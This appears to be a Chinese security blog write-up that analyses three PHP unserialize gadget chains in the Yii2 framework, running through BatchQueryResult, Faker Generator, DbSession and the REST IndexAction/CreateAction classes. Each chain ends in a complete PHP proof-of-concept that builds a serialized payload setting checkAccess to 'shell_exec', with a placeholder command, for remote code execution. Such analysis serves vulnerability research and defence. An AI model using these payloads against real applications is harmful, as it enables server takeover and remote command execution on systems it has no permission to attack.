利用链一
从BatchQueryResult出发,关键源码:(下文关于类的代码都只保留了关键部分)
可以看到reset()方法里面的
$this->_dataReader->close();
是可控的,并且在调用__destruct()会直接指向reset();方法
不难想到可以让_dataReader替换为拥有__call方法,并且不含close()方法的对象,这样就能去触发__call方法,从而让利用链延续
即$this->_dataReader=new Generator();
利用链条的第二环,Generator
关键源码为
经过起始链对对象的操作,也就等价于运行
而该部分的
return call_user_func_array($this->formatters['close'], []); 的$this->formatters['close']是可控的
而且call_user_func_array()是一个重要的可利用函数,作用是:调用一个回调函数,并将一个参数数组传递给它。
回调函数就是一个被当做参数给另一个函数的函数。
到这里,通过起始链的要求,找到的这条链子,有极高的自由度,只需要再找到一个拥有RCE特征的方法的对象即可收尾
即$this->formatters['close'] = [new IndexAction(), 'run'];
利用链的第三环,IndexAction
该对象的checkAccess和id都是可控的
而且作用容器是call_user_func() call_user_func('x','y')就是把右边作为左边的输入
只需要把checkAccess改为shell_exec id改为需要执行的命令就行
即$this->checkAccess = 'shell_exec';
` $this->id = '命令执行语句'; `
最终的利用链条就是
点击查看代码
<?phpnamespace yii\rest{class IndexAction{public $checkAccess;public $id;public function __construct(){$this->checkAccess = 'shell_exec';$this->id = '命令执行语句'; }}
}
namespace Faker {use yii\rest\IndexAction;class Generator{protected $formatters;public function __construct(){$this->formatters['close'] = [new IndexAction(), 'run'];}}
}
namespace yii\db{use Faker\Generator;class BatchQueryResult{private $_dataReader;public function __construct(){$this->_dataReader=new Generator();}}
}
namespace{use yii\db\BatchQueryResult;echo serialize(new BatchQueryResult());
}
利用链二
从Swift_KeyCache_DiskKeyCache出发
$this->path . "/" . $item['is'];容易让人联想到__tosting方法,当一个对象被当做字符串调用的时候,会自动触发该对象的__tostring方法
需要寻找一个对象,其拥有__tosting方法且能够以被利用
即$this->path = new See;
利用链的第二环,See
return (string) $this->description;的意思是强制将$this->description;转换为字符串,并返回结果
如果目标是对象,且定义了__tosting方法,则会调用;没有定义__toString() 且没有定义 __call() PHP 抛出致命错误,行为终止。
这里利用对象的__call方法(要是利用__tostring干嘛不直接放第二环)
即$this->description = new Generator();
利用链的第三环,Generator
这个类在利用链一出现过,不多赘述
主要利用了call_user_func_array()的灵活性,去衔接一个有RCE特征的对象
即 $this->formatters['render'] = [new CreateAction(), 'run'];
利用链的第四环,CreateAction
有没有似曾相识的感觉?和IndexAction的run()方法的效果完全一致!两个不同的类出现相同的方法也并不奇怪
即 $this->checkAccess = 'shell_exec';
$this->id = '执行语句';
最终的利用链就是
点击查看代码
<?php
namespace yii\rest{class CreateAction{public $checkAccess;public $id;public function __construct(){$this->checkAccess = 'shell_exec';$this->id = '执行语句';}}
}namespace Faker{use yii\rest\CreateAction;class Generator{protected $formatters;public function __construct(){$this->formatters['render'] = [new CreateAction(), 'run'];}}
}namespace phpDocumentor\Reflection\DocBlock\Tags{use Faker\Generator;class See{protected $description;public function __construct(){$this->description = new Generator();}}
}
namespace{use phpDocumentor\Reflection\DocBlock\Tags\See;class Swift_KeyCache_DiskKeyCache{private $keys = [];private $path;public function __construct(){$this->path = new See;$this->keys = array("yes"=>array("is"=>"wind"));}}echo serialize(new Swift_KeyCache_DiskKeyCache());
}
?>
利用链三
从BatchQueryResult出发
BatchQueryResult的代码与利用链一的完全一致
$this->_dataReader=new DbSession();
利用链的第二环,DbSession
不同于利用链条一,不需要再借助__call方法去作为跳板,而是在第二环调用同为close()的方法
而这个close()方法的writeCallback 和getId()都是可控的,接收函数还是call_user_func(),虽然另外接收了两个参数,但是在php里,函数在接收多余参数时不会报错
于是直接$this->writeCallback=[new IndexAction(),'run'];即可运行run()方法
继续对run方法赋值
$this->checkAccess = 'shell_exec';
$this->id = '执行语句';
最终的利用链就是
点击查看代码
<?phpnamespace yii\rest{class IndexAction{public $checkAccess;public $id;public function __construct(){$this->checkAccess = 'shell_exec';$this->id = '执行语句';}}
}
namespace yii\db{use yii\web\DbSession;class BatchQueryResult{private $_dataReader;public function __construct(){$this->_dataReader=new DbSession();}}
}
namespace yii\web{use yii\rest\IndexAction;class DbSession{public $writeCallback;public function __construct(){$this->writeCallback=[new IndexAction(),'run'];}}
}namespace{use yii\db\BatchQueryResult;echo serialize(new BatchQueryResult());
}